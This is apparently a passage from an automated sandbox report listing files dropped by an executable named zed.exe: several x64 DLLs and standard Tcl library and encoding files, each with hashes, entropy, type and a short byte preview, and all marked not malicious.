                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N@.. ... ... ...... ..k!... ..k#... ..k$... ..k%... ..l!... ...!... ..h!... ...!.Y. ..l-... ..l ... ..l.... ..l"... .Rich.. .........................PE..d......f.........." ...(.V.......... @............................................../.....`.........................................p...P................................/......X...@}..T............................|..@............p..(............................text....T.......V.................. ..`.rdata...O...p...P...Z..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):160024
                                                                                                                                                                                                                                            Entropy (8bit):6.85368707809341
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:lsvkxujgo7e2uONOG+hi+C8znfF9mNooXnmbutI1Z1mb:lnu0o7JUrNYOo2Kz
                                                                                                                                                                                                                                            MD5:8CFBAFE65D6E38DDE8E2E8006B66BB3E
                                                                                                                                                                                                                                            SHA1:CB63ADDD102E47C777D55753C00C29C547E2243C
                                                                                                                                                                                                                                            SHA-256:6D548DB0AB73291F82CF0F4CA9EC0C81460185319C8965E829FAEACAE19444FF
                                                                                                                                                                                                                                            SHA-512:FA021615D5C080AADCD5B84FD221900054EB763A7AF8638F70CF6CD49BD92773074F1AC6884F3CE1D8A15D59439F554381377FAEE4842ED5BEB13FF3E1B510F4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.3H%.`H%.`H%.`A]7`L%.`...aJ%.`...aK%.`...a@%.`...aD%.`]..aK%.`.].aJ%.`H%.`-%.`]..ar%.`]..aI%.`].[`I%.`]..aI%.`RichH%.`........................PE..d......f.........." ...(.f..........`8....................................................`......................................... %..L...l%..x....p.......P.......B.../......4.......T...............................@............................................text...be.......f.................. ..`.rdata..............j..............@..@.data...p....@......................@....pdata.......P......."..............@..@.rsrc........p.......6..............@..@.reloc..4............@..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):35608
                                                                                                                                                                                                                                            Entropy (8bit):6.432025225087344
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:a1Rp7eiajKCWnAxQ0zduVI1Wt95YiSyvAAMxkE3:mRteiaoAxQ0zIVI1Wtj7SyGxr
                                                                                                                                                                                                                                            MD5:EB859FC7F54CBA118A321440AD088096
                                                                                                                                                                                                                                            SHA1:9D3C410240F4C5269E07FFBDE43D6F5E7CC30B44
                                                                                                                                                                                                                                            SHA-256:14BDD15D60B9D6141009AEEDC606007C42B46C779A523D21758E57CF126DC2A4
                                                                                                                                                                                                                                            SHA-512:694A9C1CC3DC78B47FAEDF66248FF078E5090CFAB22E95C123FB99B10192A5748748A5F0937FFD9FD8E1873AD48F290BE723FE194B7EB2A731ADD7F5FB776C4A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.A)../z../z../z..z../z.$.{../z.$,{../z.$+{../z.$*{../z.#.{../z...zr./z[..{../z.#"{../z.#/{../z.#.z../z.#-{../zRich../z........PE..d.....f.........." ...(. ...>......@................................................J....`.........................................@E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata... ...0..."...$..............@..@.data...`....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):56088
                                                                                                                                                                                                                                            Entropy (8bit):6.331247108655531
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:Minr44gaZPXxCJ/+yZdDDr5I1Xtw7Sy+xmS2:M3J/+yZdDDr5I1Xtwf
                                                                                                                                                                                                                                            MD5:DF92EA698A3D0729B70A4306BBE3029F
                                                                                                                                                                                                                                            SHA1:B82F3A43568148C64A46E2774AEC39BF1F2D3C1E
                                                                                                                                                                                                                                            SHA-256:46DEC978EC8CB2146854739BFEDDEA93335DCC92A25D719352B94F9517855032
                                                                                                                                                                                                                                            SHA-512:BDEBAFE1B40244A0CB6C97E75424F79CFE395774A9D03CDB02F82083110C1F4BDCAC2819BA1845AD1C56E2D2E6506DCC1833E4EB269BB0F620F0EB73B4D47817
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.{X..(X..(X..(QxT(\..(...)Z..(...)[..(...)P..(...)T..(M..)Z..(X..(/..(.x.)]..(.x.)Y..(M..)Y..(M..)Y..(M.8(Y..(M..)Y..(RichX..(........PE..d.....f.........." ...(.N...`.......................................................M....`.............................................X.............................../......(....f..T............................e..@............`...............................text...7L.......N.................. ..`.rdata...8...`...:...R..............@..@.data...0...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32536
                                                                                                                                                                                                                                            Entropy (8bit):6.552970921547832
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:1lzRmezd6rGjMoW4BI1QUGL5YiSyv8+WAMxkEW7:LRm0MGooW4BI1QUG17SyIxC7
                                                                                                                                                                                                                                            MD5:7D91DD8E5F1DBC3058EA399F5F31C1E6
                                                                                                                                                                                                                                            SHA1:B983653B9F2DF66E721ECE95F086C2F933D303FC
                                                                                                                                                                                                                                            SHA-256:76BBA42B1392DC57A867AEF385B990FA302A4F1DCF453705AC119C9C98A36E8D
                                                                                                                                                                                                                                            SHA-512:B8E7369DA79255A4BB2ED91BA0C313B4578EE45C94E6BC74582FC14F8B2984ED8FCDA0434A5BD3B72EA704E6E8FD8CBF1901F325E774475E4F28961483D6C7CF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.\.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d.....f.........." ...(.....8.......................................................x....`..........................................C..L...<D..d....p.......`.......P.../...........4..T...........................@3..@............0..8............................text............................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):83736
                                                                                                                                                                                                                                            Entropy (8bit):6.31969940395018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:COYhekrkJqlerLSyypHi9/s+S+pzjii/n1IsJqKNBI1Lw9PD7Sy9duxJ:jwkJqHyypHi9/sT+pzjiE1IwdNBI1LwU
                                                                                                                                                                                                                                            MD5:E43AED7D6A8BCD9DDFC59C2D1A2C4B02
                                                                                                                                                                                                                                            SHA1:36F367F68FB9868412246725B604B27B5019D747
                                                                                                                                                                                                                                            SHA-256:2C2A6A6BA360E38F0C2B5A53B4626F833A3111844D95615EBF35BE0E76B1EF7A
                                                                                                                                                                                                                                            SHA-512:D92E26EB88DB891DE389A464F850A8DA0A39AF8A4D86D9894768CB97182B8351817CE14FE1EB8301B18B80D1D5D8876A48BA66EB7B874C7C3D7B009FCDBC8C4E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c|.Nb}g.a|.Nb}g.f|.Nb}g.g|.Nb}..c|.Nb}.Nc}.Nb}.6c|.Nb}..o|.Nb}..b|.Nb}..}.Nb}..`|.Nb}Rich.Nb}................PE..d......f.........." ...(.x..........0-.......................................`......@.....`.........................................@...P............@.......0.........../...P......P...T...............................@............................................text....v.......x.................. ..`.rdata...x.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178456
                                                                                                                                                                                                                                            Entropy (8bit):5.974570300962832
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:ZmkiCZfBmvD1ZLnM2Yfp6XSVJLX2GvMf1ba+VRJNI7IM/H9o/PCrXuI3JtI1C7lD:xiC5QD1dwp6XSxMfjTwJxd
                                                                                                                                                                                                                                            MD5:6A2B0F8F50B47D05F96DEFF7883C1270
                                                                                                                                                                                                                                            SHA1:2B1AEB6FE9A12E0D527B042512FC8890EEDB10D8
                                                                                                                                                                                                                                            SHA-256:68DAD60FF6FB36C88EF1C47D1855517BFE8DE0F5DDEA0F630B65B622A645D53A
                                                                                                                                                                                                                                            SHA-512:A080190D4E7E1ABB186776AE6E83DAB4B21A77093A88FCA59CE1F63C683F549A28D094818A0EE44186DDEA2095111F1879008C0D631FC4A8D69DD596EF76CA37
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........^..`...`...`......`./ia...`./ic...`./id...`./ie...`..na...`..ja...`...a.u.`...a...`..nm...`..n`...`..n....`..nb...`.Rich..`.........PE..d......f.........." ...(.............,....................................................`.............................................d...D...................P......../......x.......T...........................@...@............................................text............................... ..`.rdata...#.......$..................@..@.data...p...........................@....pdata..P............b..............@..@.rsrc................n..............@..@.reloc..x............x..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21523
                                                                                                                                                                                                                                            Entropy (8bit):4.827830596623684
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:UqT9XC9VZv9QXCTxsCTHI7672ORgS0mzBvxFRTX7Xvt3wBTnFXhCUvuyqz:LT9XC9VZviXCVsCLI7JlmzBvTxvt3gTW
                                                                                                                                                                                                                                            MD5:08EDF746B4A088CB4185C165177BD604
                                                                                                                                                                                                                                            SHA1:395CDA114F23E513EEF4618DA39BB86D034124BF
                                                                                                                                                                                                                                            SHA-256:517204EE436D08EFC287ABC97433C3BFFCAF42EC6592A3009B9FD3B985AD772C
                                                                                                                                                                                                                                            SHA-512:C1727E265A6B0B54773C886A1BCE73512E799BA81A4FCEEEB84CDC33F5505A5E0984E96326A78C46BF142BC4652A80E213886F60EB54ADF92E4DFFE953C87F6B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# auto.tcl --..#..# utility procs formerly in init.tcl dealing with auto execution of commands..# and can be auto loaded themselves...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# auto_reset --..#..# Destroy all cached information for auto-loading and auto-execution, so that..# the information gets recomputed the next time it's needed. Also delete any..# commands that are listed in the auto-load index...#..# Arguments:..# None.....proc auto_reset {} {.. global auto_execs auto_index auto_path.. if {[array exists auto_index]} {...foreach cmdName [array names auto_index] {... set fqcn [namespace which $cmdName]... if {$fqcn eq ""} {....continue... }... rename $fqcn {}...}.. }.. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath.. if {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):133439
                                                                                                                                                                                                                                            Entropy (8bit):5.044814789288095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:Cbn4IAhYvuCg9epsArAzqpSMpWzP7ejMiIAxBPqGYkPAPaZpHYM8EN4LhVLlarXL:Cbn4IM9epsArSqpSMpWzP7ejM/eBPqG3
                                                                                                                                                                                                                                            MD5:88BB44A1364147FDD80F9FD78FBCEF61
                                                                                                                                                                                                                                            SHA1:2C3454D2669F0CA83FECF17976D599C85B86E615
                                                                                                                                                                                                                                            SHA-256:1947F8B188AB4AB6AA72EA68A58D2D9ADD0894FDF320F6B074EAE0F198368FB7
                                                                                                                                                                                                                                            SHA-512:010B13E8A2D50521B5D7ADCC5F32F7CDE3F12E1053961C575D967DC6CFD368640BF45D23832E5E9C3868CDCA9FE0505698F949C5557D4169353634C94AA196B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#----------------------------------------------------------------------..#..# clock.tcl --..#..#.This file implements the portions of the [clock] ensemble that are..#.coded in Tcl. Refer to the users' manual to see the description of..#.the [clock] command and its subcommands...#..#..#----------------------------------------------------------------------..#..# Copyright (c) 2004-2007 Kevin B. Kenny..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#----------------------------------------------------------------------....# We must have message catalogs that support the root locale, and we need..# access to the Registry on Windows systems.....uplevel \#0 {.. package require msgcat 1.6.. if { $::tcl_platform(platform) eq {windows} } {...if { [catch { package require registry 1.1 }] } {... namespace eval ::tcl::clock [list variable NoRegistry {}]...}.. }..}....# Put the library directory in
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):2.1033474959326957
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:5c2VBUvEWVrVJ/eyN9j2iV2NdWWT0VbusV7EV7KVAMmVZyd851VFpsGkliX:5HVBUlJvRj7SOVbusZhAMiZyi77qsX
                                                                                                                                                                                                                                            MD5:9E3A454FA480E9A99D2D5ACDAA775233
                                                                                                                                                                                                                                            SHA1:493637BB570A5C96BB62F998BD0391FB59AFC5F0
                                                                                                                                                                                                                                            SHA-256:FB87BF197F4F485B08EA81F7534BC07D9C3A538D022424BE11011A1FE3C413FD
                                                                                                                                                                                                                                            SHA-512:EDFCB2BB6AB052D28D5CEBD08AD57F36D3A4CB83D557B1359B0ADE1266E24D8F3CE87B8240881396A5BA4FB45F8B74014784E8885CDB86680D98977CC0D130F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: ascii, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):94389
                                                                                                                                                                                                                                            Entropy (8bit):3.3217406555698195
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:UAHU3LIkZlmXrd/uQ0ao98zgKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fd:UVduBGf94gFMT6q95GDRBfd
                                                                                                                                                                                                                                            MD5:41A874778111CC218BD421CF9C795EC2
                                                                                                                                                                                                                                            SHA1:80857D106F71199CE187833D38DB091A819A520C
                                                                                                                                                                                                                                            SHA-256:AD1ED201B69855BFD353BF969DFC55576DA35A963ABF1BF7FC6D8B5142A61A61
                                                                                                                                                                                                                                            SHA-512:4244624124F86A3EFAB4C70B115A46C8ADF02D708860FA5F327CDBFA24BC3F9EFAD0C6EE58DE96B0B6BBC4CF6D99B322BB8657129007C86D6482F41C1503AAD4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: big5, multi-byte..M..003F 0 89..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):98634
                                                                                                                                                                                                                                            Entropy (8bit):2.438904802083714
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:MPFOsOKqBLPf62X4lgQeLHj6RHUn0TQb8G47Ianrd28gr:MPAsknjX4OQe7aoMMarAFr
                                                                                                                                                                                                                                            MD5:B6A7C59E6A48D91CC2DBCB2BBA7E4510
                                                                                                                                                                                                                                            SHA1:16A9338F18202B26981F2028BEA412DD03BB0FF2
                                                                                                                                                                                                                                            SHA-256:8924545CC92584169138AADB64683C07BBF846A57014C2E668D23B63F43F3610
                                                                                                                                                                                                                                            SHA-512:3D644CF394A528A8699BE3679F787A4E1DAD657C04B810580A4C520F2C043471640FBE080AC46DFD3924C47A73BEE12A6AC69D291D09EB791AD0D64A73750B43
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cns11643, double-byte..D..2134 0 93..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00004E284E364E3F4E854E054E04518251965338536953B64E2A4E874E4951E2..4E464E8F4EBC4EBE516651E35204529C53B95902590A5B805DDB5E7A5E7F5EF4..5F505F515F61961D4E3C4E634E624EA351854EC54ECF4ECE4ECC518451865722..572351E45205529E529D52FD5300533A5C735346535D538653B7620953CC6C15..53CE57216C3F5E005F0C623762386534653565E04F0E738D4E974EE04F144EF1..4EE74EF74EE64F1D4F024F054F2256D8518B518C519951E55213520B52A60000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.3578844928761034
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CqHVBUlJvRj7SOVbusZhAMiZyi77q8ujr4z8tjsuVO6ys2K:JMlBVnrAMiwMm8ujr4z8emTys2K
                                                                                                                                                                                                                                            MD5:9568EDE60D3F917F1671F5A625A801C4
                                                                                                                                                                                                                                            SHA1:4F5B3308FE7F6845B46779DECF9B395E47AC7396
                                                                                                                                                                                                                                            SHA-256:E2991A6F7A7A4D8D3C4C97947298FD5BACB3EAA2F898CEE17F5E21A9861B9626
                                                                                                                                                                                                                                            SHA-512:9C32BE3E25FC2211CE91F7B9AE1F9EBA20071272BE2BBBA63A8B6E3CD6543C4C32CD62C4C4D153C94F5BE212E974A61EEFD70DDC005F1688D09D9D56E8E298A8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1250, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0083201E2026202020210088203001602039015A0164017D0179..009020182019201C201D202220132014009821220161203A015B0165017E017A..00A002C702D8014100A4010400A600A700A800A9015E00AB00AC00AD00AE017B..00B000B102DB014200B400B500B600B700B80105015F00BB013D02DD013E017C..015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E..01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF..015500E100E2010300E40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.358948900439905
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CTHVBUlJvRj7SOVbusZhAMiZyi77qpREwKsF/+++SAJlz9aRme3cJI:wMlBVnrAMiwMmpKwKm/EYnsJI
                                                                                                                                                                                                                                            MD5:83DAF47FD1F87B7B1E9E086F14C39E5B
                                                                                                                                                                                                                                            SHA1:77AE330512EBFEF430A02213644BD1CFCE174298
                                                                                                                                                                                                                                            SHA-256:0AA66DFF8A7AE570FEE83A803F8F5391D9F0C9BD6311796592D9B6E8E36BE6FC
                                                                                                                                                                                                                                            SHA-512:D7CE2F44EDFE1DA6D3E07E9A41BB08AD42430BAAFADD09FD217F4B524323A01A1F4913B640C552D38AAEBFF75B0D50ED7A813A2A57C4019311158890C0162DF9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1251, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..04020403201A0453201E20262020202120AC203004092039040A040C040B040F..045220182019201C201D202220132014009821220459203A045A045C045B045F..00A0040E045E040800A4049000A600A7040100A9040400AB00AC00AD00AE0407..00B000B104060456049100B500B600B704512116045400BB0458040504550457..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..043004310432043304340
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.292994562910468
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:C4HVBUlJvRj7SOVbusZhAMiZyi77qdmV/rcwvGNNlkL+rSMH+tKv:rMlBVnrAMiwMmd2r/okLz0
                                                                                                                                                                                                                                            MD5:E9117326C06FEE02C478027CB625C7D8
                                                                                                                                                                                                                                            SHA1:2ED4092D573289925A5B71625CF43CC82B901DAF
                                                                                                                                                                                                                                            SHA-256:741859CF238C3A63BBB20EC6ED51E46451372BB221CFFF438297D261D0561C2E
                                                                                                                                                                                                                                            SHA-512:D0A39BC41ADC32F2F20B1A0EBAD33BF48DFA6ED5CC1D8F92700CDD431DB6C794C09D9F08BB5709B394ACF54116C3A1E060E2ABCC6B503E1501F8364D3EEBCD52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1252, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030016020390152008D017D008F..009020182019201C201D20222013201402DC21220161203A0153009D017E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E300E40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.422723556981327
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CRHVBUlJvRj7SOVbusZhAMiZyi77qduWn4T5K9QQSqiWeIDDdn:CMlBVnrAMiwMmduWnSKyQSqiWeIVn
                                                                                                                                                                                                                                            MD5:441B86A0DE77F25C91DF1CD4685F651D
                                                                                                                                                                                                                                            SHA1:D1E429916BC9423F55EEC8F17941521E9FE9D32B
                                                                                                                                                                                                                                            SHA-256:5B8D47451F847C1BDE12CACA3739CA29860553C0B6399EE990D51B26F9A69722
                                                                                                                                                                                                                                            SHA-512:35DF342DDA4E8790C6D53762465DF8B93B49B7B7E211D7A5753078EF559C9C9383EFF7285A90FF5C0020FBB16AF380EE3C8643F4CEB1E41917E72021079D722F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1253, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202100882030008A2039008C008D008E008F..009020182019201C201D20222013201400982122009A203A009C009D009E009F..00A00385038600A300A400A500A600A700A800A9000000AB00AC00AD00AE2015..00B000B100B200B3038400B500B600B703880389038A00BB038C00BD038E038F..0390039103920393039403950396039703980399039A039B039C039D039E039F..03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF..03B003B103B203B303B40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.307590929679485
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CWHVBUlJvRj7SOVbusZhAMiZyi77qdjrcFvGNNlkBSMH+tA/b:lMlBVnrAMiwMmdjriokgzAD
                                                                                                                                                                                                                                            MD5:5FA9162BEC5A4DEA97B5EA2840CFB065
                                                                                                                                                                                                                                            SHA1:F26858E3D2FB928F39CA87CBB8446AF099570CAD
